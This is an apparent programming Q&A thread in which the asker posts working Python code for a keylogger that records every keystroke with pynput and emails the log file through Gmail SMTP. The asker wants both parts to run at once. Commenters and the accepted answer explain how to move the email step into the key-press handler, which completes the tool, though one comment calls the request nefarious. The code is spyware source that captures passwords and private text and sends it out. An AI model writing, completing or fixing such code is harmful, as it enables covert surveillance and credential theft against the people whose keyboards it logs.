# Having trouble with the python 3.4.1 code. Wont follow through with task given

Tags: python

I'm trying to code a keylogger that sends its log file to my email address. The KeyLogger and Email work fine separately but when put in the same IDLE file only the one listed first works and the one second does not.
Ex) 
The code I'm using - the keylogger works fine because it is before the email but I was wondering how to get them both to work at the same time.

```
from pynput.keyboard import Key, Listener
import logging
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart 
from email.mime.base import MIMEBase
from email import encoders

#keylogger 
log_dir = "C:\KeyLogger Python\Key_InputLog.txt" 

logging.basicConfig(filename=(log_dir), level=logging.DEBUG, format='%
(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

#sending email to self.

email_sender = 'Emailhere@gmail.com'
email_receive = 'Emailhere@gmail.com'
password = 'Password!'
subject = 'KLE - Key_InputLog.txt'

msg = MIMEMultipart()
msg['From'] = email_sender
msg['to'] = email_receive
msg['Subject'] = subject

body = 'Sending a message via Python 3'
msg.attach(MIMEText(body,'plain'))

filename='Key_InputLog.txt'
attachment =open(filename,'rb')

part = MIMEBase('application','octet-stream')
part.set_payload((attachment).read())
encoders.encode_base64(part)
part.add_header('Content-Disposition',"attachment; filename= "+filename)

msg.attach(part)
text = msg.as_string()
server = smtplib.SMTP('smtp.gmail.com',587)
server.starttls()
server.login(email_sender,password)


server.sendmail(email_sender,email_receive,text)
server.quit()
```

Comment: When do you expect this email to be sent? I think it needs to go into a function to be called periodically by on_press...

Comment: I've done that but now I can't get the keylogger to work nor the email.

Comment: BTW, we ask for a [mcve] -- **Minimal** meaning the *shortest possible code* that reflects a problem. In this case, "the problem" is that your code block isn't invoked when a key is pressed -- you could have taken out all that email code and just put in a `print("THIS SHOULD RUN")` in the place where the email content is, and you would have precisely the same behavior (`THIS SHOULD RUN` not being printed when keypress events took place). Moreover, that would have avoided overtly asking how to do something nefarious, which tends to be... frowned on.

Answer (score 0, accepted):

Move the code that needs to be run on an event into the `on_press()` function instead of keeping it at the module level.